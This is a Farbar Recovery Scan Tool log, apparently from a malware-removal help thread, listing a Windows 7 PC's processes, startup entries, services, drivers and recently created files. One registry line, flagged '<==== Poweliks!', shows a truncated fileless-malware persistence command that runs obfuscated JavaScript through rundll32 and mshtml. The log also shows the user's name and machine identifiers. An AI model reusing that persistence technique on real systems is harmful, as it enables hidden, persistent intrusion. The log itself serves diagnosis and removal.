2014-09-19 23:54 - 2014-09-19 23:26 - 00000000 ____D () C:\Users\Matts\AppData\Local\NPE
2014-09-19 23:38 - 2014-09-19 23:38 - 00000000 ____D () C:\NPE
2014-09-19 23:26 - 2014-09-19 23:26 - 00000000 ____D () C:\ProgramData\Norton
2014-09-19 21:42 - 2012-10-10 02:35 - 00000000 ____D () C:\Windows\Panther
2014-09-19 20:06 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache
2014-09-19 19:18 - 2012-10-10 13:33 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-09-19 19:18 - 2012-10-10 13:33 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-09-14 19:30 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-14 18:51 - 2014-09-14 18:51 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-14 18:51 - 2014-09-14 18:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-09-14 18:51 - 2013-01-08 12:23 - 00000000 ____D () C:\Program Files\CCleaner
2014-09-14 18:35 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\addins
2014-09-14 18:19 - 2014-09-14 18:19 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2012-10-10 15:18 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Malwarebytes
2014-09-14 18:19 - 2012-10-10 15:17 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-14 18:19 - 2012-10-10 15:17 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-09-14 18:07 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-09-11 23:08 - 2014-09-11 23:08 - 00000000 ____D () C:\958f45868474b8ea08185f0d725a
2014-09-11 23:08 - 2013-07-18 09:36 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-11 23:08 - 2012-10-17 21:06 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-11 23:08 - 2012-10-09 23:14 - 00002117 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Security Essentials.lnk
2014-09-11 23:08 - 2012-10-09 23:14 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-09-11 23:08 - 2012-10-09 23:14 - 00000000 ____D () C:\Program Files\Microsoft Security Client
2014-09-09 17:47 - 2014-09-24 09:36 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieUserList
2014-08-27 15:08 - 2014-08-27 15:08 - 00000000 __SHD () C:\Users\Matts\AppData\Local\EmieSiteList

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-09-19 19:59

 

==================== End Of Log ============================

 

Here is a log from C:\FRST\Logs:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 25-09-2014
Ran by Matts (administrator) on MATTS-PC on 25-09-2014 10:51:39
Running from C:\Users\Matts\Desktop
Loaded Profile: Matts (Available profiles: Matts)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\stacsv.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\AEstSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\WerFault.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray.exe
(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe
(Dell) C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Corporation) C:\Windows\System32\wermgr.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-09-05] (Adobe Systems Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [458844 2009-06-29] (IDT, Inc.)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...\Run: [DellSystemDetect] => C:\Users\Matts\AppData\Local\Apps\2.0\W22XG8XY.X98\VYHXE5MW.KWW\dell..tion_0f612f649c4a10af_0005.000b_17ede8fa7a4e5cac\DellSystemDetect.exe [267328 2014-09-21] (Dell)
HKU\S-1-5-21-3021788917-465817279-1536284282-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.msn.com/?ocid=EIE9HP&PC=UP50
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xDC9F3545A5CFCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default
FF SearchEngineOrder.1: Ask Search
FF SelectedSearchEngine: user_pref("browser.search.selectedEngine", "");
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1167637.dll (Adobe Systems, Inc.)
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: Oovoo Toolbar - C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default\Extensions\toolbar_OVO2V7@apn.ask.com.xpi [2013-08-27]
FF Extension: Adblock Plus - C:\Users\Matts\AppData\Roaming\Mozilla\Firefox\Profiles\6m5pp8gy.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-09-22]
FF Extension: Hotspot Shield Extension - C:\Program Files\Mozilla Firefox\browser\extensions\afproxy@anchorfree.com [2014-09-24]
FF HKCU\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
FF Extension: No Name - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]

Chrome:
=======

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46640 2006-10-23] (AOL LLC)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_x86_neutral_7f2308f435f2c4c1\STacSV.exe [221266 2009-06-29] (IDT, Inc.)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
R3 itecir; C:\Windows\System32\DRIVERS\itecir.sys [65640 2010-07-13] (ITE Tech. Inc. )
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R3 wanatw; C:\Windows\System32\DRIVERS\wanatw4.sys [33588 2006-11-29] (America Online, Inc.)
S1 MpKsl8c5a2e11; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{75D41F0A-42E8-498F-AC63-699978EC903E}\MpKsl8c5a2e11.sys [X]
S1 MpKsla09b7e5b; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{75D41F0A-42E8-498F-AC63-699978EC903E}\MpKsla09b7e5b.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vtany; \??\C:\Windows\vtany.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-25 10:46 - 2014-09-25 10:46 - 00150568 _____ () C:\Windows\Minidump\092514-22401-01.dmp
2014-09-25 10:03 - 2014-09-25 10:51 - 00009693 _____ () C:\Users\Matts\Desktop\FRST.txt
2014-09-25 10:03 - 2014-09-25 10:03 - 00000000 ____D () C:\Users\Matts\Desktop\FRST-OlderVersion
2014-09-25 09:50 - 2014-09-25 09:53 - 00036927 _____ () C:\Users\Matts\Downloads\FRST.txt
2014-09-24 23:41 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Documents\attach.zip
2014-09-24 23:40 - 2014-09-24 23:40 - 00003231 _____ () C:\Users\Matts\Desktop\attach.zip
2014-09-24 23:24 - 2014-09-24 23:24 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-09-24 22:56 - 2014-09-24 22:56 - 00144392 _____ () C:\Windows\Minidump\092414-11060-01.dmp
2014-09-24 22:52 - 2014-09-24 22:52 - 00150568 _____ () C:\Windows\Minidump\092414-15834-01.dmp
2014-09-24 22:41 - 2014-09-24 22:41 - 00144392 _____ () C:\Windows\Minidump\092414-12277-01.dmp
2014-09-24 22:40 - 2014-09-24 22:40 - 00003280 ____N () C:\bootsqm.dat
2014-09-24 09:36 - 2014-09-09 17:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-24 09:34 - 2014-09-24 09:34 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessMonitor
2014-09-24 09:29 - 2014-09-24 09:29 - 01121208 _____ () C:\Users\Matts\Downloads\ProcessMonitor.zip
2014-09-24 00:06 - 2014-09-24 00:10 - 00000000 ____D () C:\Users\Matts\Downloads\ProcessExplorer
2014-09-24 00:05 - 2014-09-24 00:05 - 01188194 _____ () C:\Users\Matts\Downloads\ProcessExplorer.zip
2014-09-23 23:18 - 2014-09-23 23:18 - 00144392 _____ () C:\Windows\Minidump\092314-12776-01.dmp
2014-09-23 22:59 - 2014-09-23 22:59 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-MATTS-PC-Microsoft-Windows-7-Professional-(32-bit).dat
2014-09-23 22:59 - 2014-09-23 22:59 - 00000000 ____D () C:\RegBackup
2014-09-23 22:49 - 2014-09-23 22:49 - 00002117 _____ () C:\Users\Matts\Desktop\Tweaking.com - Windows Repair (All in One).lnk
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-09-23 22:49 - 2014-09-23 22:49 - 00000000 ____D () C:\Program Files\Tweaking.com
2014-09-23 22:48 - 2014-09-23 22:48 - 09690792 _____ () C:\Users\Matts\Downloads\tweaking.com_windows_repair_aio_setup.exe
2014-09-23 22:44 - 2014-09-23 22:44 - 00005635 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-09-23 22:44 - 2014-09-23 22:44 - 00000000 ____D () C:\Program Files\Common Files\Java
2014-09-23 22:44 - 2014-07-25 12:55 - 00096680 _____ (Oracle Corporation) C:\Windows\system32\WindowsAccessBridge.dll
2014-09-23 22:44 - 2014-07-25 12:49 - 00272808 _____ (Oracle Corporation) C:\Windows\system32\javaws.exe
2014-09-23 22:44 - 2014-07-25 12:49 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\javaw.exe
2014-09-23 22:44 - 2014-07-25 12:49 - 00175528 _____ (Oracle Corporation) C:\Windows\system32\java.exe
2014-09-23 22:43 - 2014-09-23 22:43 - 00918440 _____ (Oracle Corporation) C:\Users\Matts\Downloads\jre-7u67-windows-i586-iftw.exe
2014-09-23 15:12 - 2014-09-23 15:12 - 00000633 _____ () C:\Users\Matts\Desktop\JRT.txt
2014-09-22 23:01 - 2014-09-22 23:01 - 02347384 _____ (ESET) C:\Users\Matts\Downloads\esetsmartinstaller_enu.exe
2014-09-22 23:01 - 2014-09-22 23:01 - 00000000 ____D () C:\Program Files\ESET
2014-09-22 22:34 - 2014-09-22 22:34 - 00000000 ____D () C:\Windows\ERUNT
2014-09-22 22:32 - 2014-09-22 22:33 - 01024790 _____ (Thisisu) C:\Users\Matts\Desktop\JRT.exe
2014-09-22 22:20 - 2014-09-22 22:20 - 01373475 _____ () C:\Users\Matts\Downloads\adwcleaner_3.310.exe
2014-09-22 21:28 - 2014-09-22 21:29 - 00448512 _____ (OldTimer Tools) C:\Users\Matts\Downloads\TFC.exe
2014-09-22 21:18 - 2014-09-22 21:18 - 00002040 _____ () C:\Users\Matts\Desktop\Rkill.txt
2014-09-22 21:09 - 2014-09-22 21:09 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Matts\Downloads\rkill.exe
2014-09-22 21:05 - 2014-09-22 21:14 - 00033900 _____ () C:\Users\Matts\Downloads\Result.txt
2014-09-22 21:04 - 2014-09-22 21:04 - 00401920 _____ (Farbar) C:\Users\Matts\Downloads\MiniToolBox.exe
2014-09-22 20:54 - 2014-09-22 20:54 - 00001063 _____ () C:\Users\Matts\Documents\malwarebytes922.txt
2014-09-22 20:50 - 2014-09-22 20:50 - 00002759 _____ () C:\Users\Matts\Downloads\FSS.txt
2014-09-22 20:49 - 2014-09-22 20:49 - 00415232 _____ (Farbar) C:\Users\Matts\Downloads\FSS.exe
2014-09-22 20:46 - 2014-09-22 20:46 - 00854417 _____ () C:\Users\Matts\Downloads\SecurityCheck.exe
2014-09-22 20:43 - 2014-09-22 20:43 - 00150568 _____ () C:\Windows\Minidump\092214-18049-01.dmp
2014-09-22 19:54 - 2014-09-22 19:55 - 14349744 _____ (Malwarebytes Corp.) C:\Users\Matts\Downloads\mbar-1.07.0.1012.exe
2014-09-22 19:31 - 2014-09-22 19:31 - 00150568 _____ () C:\Windows\Minidump\092214-12261-01.dmp
2014-09-22 18:54 - 2014-09-25 10:51 - 00000000 ____D () C:\FRST
2014-09-22 18:54 - 2014-09-25 10:03 - 01100800 _____ (Farbar) C:\Users\Matts\Desktop\FRST.exe
2014-09-22 15:30 - 2014-09-24 22:50 - 00014933 _____ () C:\Users\Matts\Desktop\dds.txt
2014-09-22 15:30 - 2014-09-24 22:50 - 00013684 _____ () C:\Users\Matts\Desktop\attach.txt
2014-09-22 15:24 - 2014-09-22 15:24 - 00688992 ____R (Swearware) C:\Users\Matts\Downloads\dds.com
2014-09-22 15:21 - 2014-09-25 10:46 - 253082706 _____ () C:\Windows\MEMORY.DMP
2014-09-22 15:21 - 2014-09-22 15:21 - 00150568 _____ () C:\Windows\Minidump\092214-14554-01.dmp
2014-09-21 18:52 - 2014-09-21 18:52 - 00000000 ____D () C:\Program Files\Broadcom
2014-09-21 18:49 - 2014-09-21 18:49 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-09-21 18:49 - 2009-06-29 12:44 - 12021852 _____ (IDT, Inc.) C:\Windows\system32\idtcpl.cpl
2014-09-21 18:49 - 2009-06-29 12:44 - 03600384 _____ (IDT, Inc.) C:\Windows\system32\stlang.dll
2014-09-21 18:49 - 2009-06-29 12:44 - 00536576 _____ (IDT, Inc.) C:\Windows\system32\idtmini1.exe
2014-09-21 18:49 - 2009-05-12 14:26 - 00047104 _____ (Creative Technology Ltd.) C:\Windows\system32\ctppld.dll
2014-09-21 18:49 - 2009-05-12 14:25 - 00511488 _____ (Creative Technology Ltd.) C:\Windows\system32\ctapo32.dll
2014-09-21 18:49 - 2009-03-02 12:57 - 00142848 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestacap.dll
2014-09-21 18:49 - 2009-03-02 12:57 - 00061440 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestaren.dll
2014-09-21 18:49 - 2009-03-02 12:47 - 00086016 _____ (Andrea Electronics Corporation) C:\Windows\system32\AESTCom.dll
2014-09-21 18:49 - 2009-03-02 12:08 - 00368640 _____ (Andrea Electronics Corporation) C:\Windows\system32\aestecap.dll
2014-09-21 18:48 - 2014-09-21 18:50 - 00000000 ____D () C:\Program Files\IDT
2014-09-21 18:48 - 2009-06-29 12:44 - 00914944 _____ (IDT, Inc.) C:\Windows\system32\stapo.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00485888 ____N (IDT, Inc.) C:\Windows\system32\stapi32.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00408576 _____ (IDT, Inc.) C:\Windows\system32\Drivers\stwrt.sys
2014-09-21 18:48 - 2009-06-29 12:44 - 00405504 _____ (IDT, Inc.) C:\Windows\system32\stcplx.dll
2014-09-21 18:48 - 2009-06-29 12:44 - 00175616 _____ (IDT, Inc.) C:\Windows\system32\st326217.dll
2014-09-21 18:43 - 2014-09-21 18:43 - 16906128 _____ () C:\Users\Matts\Downloads\R226903.exe
2014-09-21 18:42 - 2014-09-21 18:43 - 29222800 _____ () C:\Users\Matts\Downloads\R232587.exe
2014-09-21 18:42 - 2014-09-21 18:43 - 18620936 _____ () C:\Users\Matts\Downloads\R258891.exe
2014-09-21 17:41 - 2014-09-21 17:41 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Dell
2014-09-21 17:40 - 2014-09-21 19:08 - 00000000 ____D () C:\ProgramData\PCDr
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 17:40 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-09-21 17:15 - 2014-09-21 17:40 - 00000000 ____D () C:\Program Files\My Dell
2014-09-21 17:00 - 2014-09-21 19:08 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\PCDr
2014-09-21 17:00 - 2014-09-21 19:02 - 00000000 ____D () C:\temp
2014-09-21 16:59 - 2014-09-21 16:59 - 00000000 ____D () C:\Users\Matts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-09-21 16:58 - 2014-09-21 16:58 - 00420552 _____ () C:\Users\Matts\Downloads\DellSystemDetect.exe
2014-09-21 16:56 - 2014-09-21 16:56 - 00000000 ____D () C:\Users\Matts\AppData\Local\Microsoft_Corporation
2014-09-20 15:47 - 2014-09-24 08:49 - 00001324 _____ () C:\Windows\PFRO.log
2014-09-20 15:30 - 2014-09-22 22:30 - 00000000 ____D () C:\AdwCleaner
2014-09-20 12:08 - 2014-09-20 12:08 - 00000017 _____ () C:\Users\Matts\AppData\Local\resmon.resmoncfg
2014-09-20 08:36 - 2014-09-25 00:17 - 00000000 ____D () C:\Users\Matts\AppData\Local\CrashDumps
2014-09-20 08:16 - 2014-09-20 08:16 - 00002617 _____ () C:\Users\Matts\Downloads\download.dlm
2014-09-20 00:36 - 2014-09-25 10:46 - 00002007 _____ () C:\Windows\setupact.log
2014-09-20 00:36 - 2014-09-20 00:36 - 00000000 _____ () C:\Windows\setuperr.log
2014-09-19 23:38 - 2014-09-19 23:38 - 00000000 ____D () C:\NPE
2014-09-19 23:26 - 2014-09-19 23:54 - 00000000 ____D () C:\Users\Matts\AppData\Local\NPE
2014-09-19 23:26 - 2014-09-19 23:26 - 00000000 ____D () C:\ProgramData\Norton
2014-09-14 20:35 - 2014-09-22 20:07 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-14 20:34 - 2014-09-22 20:07 - 00000000 ____D () C:\Users\Matts\Desktop\mbar
2014-09-14 18:51 - 2014-09-14 18:51 - 00000965 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-09-14 18:51 - 2014-09-14 18:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-09-14 18:19 - 2014-09-22 20:52 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 18:19 - 2014-09-22 19:55 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-14 18:19 - 2014-09-14 18:19 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-09-14 18:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 18:19 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-13 18:39 - 2014-08-18 17:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-13 18:39 - 2014-08-18 17:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-13 18:39 - 2014-08-18 17:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-13 18:39 - 2014-08-18 17:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-13 18:39 - 2014-08-18 17:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-13 18:39 - 2014-08-18 17:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-13 18:39 - 2014-08-18 17:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-13 18:39 - 2014-08-18 17:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-13 18:39 - 2014-08-18 17:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-13 18:39 - 2014-08-18 17:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-13 18:39 - 2014-08-18 17:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-13 18:39 - 2014-08-18 17:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-13 18:39 - 2014-08-18 17:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-13 18:39 - 2014-08-18 17:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-13 18:39 - 2014-08-18 17:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-13 18:39 - 2014-08-18 17:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-13 18:39 - 2014-08-18 17:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-13 18:39 - 2014-08-18 17:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-13 18:39 - 2014-08-18 17:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-13 18:39 - 2014-08-18 17:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-13 18:39 - 2014-08-18 17:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-13 18:39 - 2014-08-18 16:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-13 18:38 - 2014-08-19 13:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
